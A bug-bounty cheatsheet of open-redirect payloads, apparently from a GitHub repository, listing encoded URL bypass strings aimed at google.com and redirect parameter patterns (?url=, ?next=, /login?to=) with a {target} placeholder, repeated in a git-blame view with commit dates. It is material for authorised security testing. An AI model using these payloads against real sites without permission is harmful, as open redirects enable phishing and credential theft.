bugbounty-cheatsheet/cheatsheets/open-redirect.md

## Open Redirect

```
/%09/google.com
```

```
/%5cgoogle.com
```

```
//www.google.com/%2f%2e%2e
```

```
//www.google.com/%2e%2e
```

```
//google.com/
```

```
//google.com/%2f..
```

```
//\google.com
```

```
/\victim.com:80%40google.com
```

## Possible open redirect parameters

```
?url=http://{target}
```

```
?url=https://{target}
```

```
?next=http://{target}
```

```
?next=https://{target}
```

```
?url=https://{target}
```

```
?url=http://{target}
```

```
?url=//{target}
```

```
?url=$2f%2f{target}
```

```
?next=//{target}
```

```
?next=$2f%2f{target}
```

```
?url=//{target}
```

```
?url=$2f%2f{target}
```

```
?url=//{target}
```

```
/redirect/{target}
```

```
/cgi-bin/redirect.cgi?{target}
```

```
/out/{target}
```

```
/out?{target}
```

```
/out?/{target}
```

```
/out?//{target}
```

```
/out?/\{target}
```

```
/out?///{target}
```

```
?view={target}
```

```
?view=/{target}
```

```
?view=//{target}
```

```
?view=/\{target}
```

```
?view=///{target}
```

```
/login?to={target}
```

```
/login?to=/{target}
```

```
/login?to=//{target}
```

```
/login?to=/\{target}
```

```
/login?to=///{target}
```


**Open Redirect Payloads** by @cujanovic

https://github.com/cujanovic/Open-Redirect-Payloads


**Open Redirect Paramters** by @fuzzdb-project

https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/redirect/redirect-urls-template.txt
Add individual files. 2017-07-14 13:54:44 +00:00			`## Open Redirect`

			```
			`/%09/google.com`
			```

			```
			`/%5cgoogle.com`
			```
Apply style guide to open-redirect.md. 2017-07-16 11:48:35 +00:00
Update open-redirect.md 2017-07-16 10:37:01 +00:00			```
Add individual files. 2017-07-14 13:54:44 +00:00			`//www.google.com/%2f%2e%2e`
			```

			```
			`//www.google.com/%2e%2e`
Update open-redirect.md 2017-07-16 10:37:01 +00:00			```
Add two extra OR strings 2017-08-16 08:16:00 +00:00
			```
			`//google.com/`
			```

			```
			`//google.com/%2f..`
			```
Update open-redirect.md 2017-09-27 15:48:44 +00:00
Update open-redirect.md 2018-02-05 00:02:58 +00:00			```
			`//\google.com`
			```

			```
			`/\victim.com:80%40google.com`
			```

Update open-redirect.md Added open redirect parameters 2017-10-25 18:19:49 +00:00			`## Possible open redirect parameters`

			```
			`?url=http://{target}`
			```

			```
			`?url=https://{target}`
			```

			```
			`?next=http://{target}`
			```

			```
			`?next=https://{target}`
			```

			```
			`?url=https://{target}`
			```

			```
			`?url=http://{target}`
			```

			```
			`?url=//{target}`
			```

			```
			`?url=$2f%2f{target}`
			```

			```
			`?next=//{target}`
			```

			```
			`?next=$2f%2f{target}`
			```

			```
			`?url=//{target}`
			```

			```
			`?url=$2f%2f{target}`
			```

			```
			`?url=//{target}`
			```

			```
			`/redirect/{target}`
			```

			```
			`/cgi-bin/redirect.cgi?{target}`
			```

			```
			`/out/{target}`
			```

			```
			`/out?{target}`
			```

			```
			`/out?/{target}`
			```

			```
			`/out?//{target}`
			```

			```
			`/out?/\{target}`
			```

			```
			`/out?///{target}`
			```

			```
			`?view={target}`
			```

			```
			`?view=/{target}`
			```

			```
			`?view=//{target}`
			```

			```
			`?view=/\{target}`
			```

			```
			`?view=///{target}`
			```

			```
			`/login?to={target}`
			```

			```
			`/login?to=/{target}`
			```

			```
			`/login?to=//{target}`
			```

			```
			`/login?to=/\{target}`
			```

			```
			`/login?to=///{target}`
			```


Update open-redirect.md 2017-09-27 15:48:44 +00:00
			`Open Redirect Payloads by @cujanovic`

			`https://github.com/cujanovic/Open-Redirect-Payloads`
Update open-redirect.md Added open redirect parameters 2017-10-25 18:19:49 +00:00

			`Open Redirect Paramters by @fuzzdb-project`

			`https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/redirect/redirect-urls-template.txt`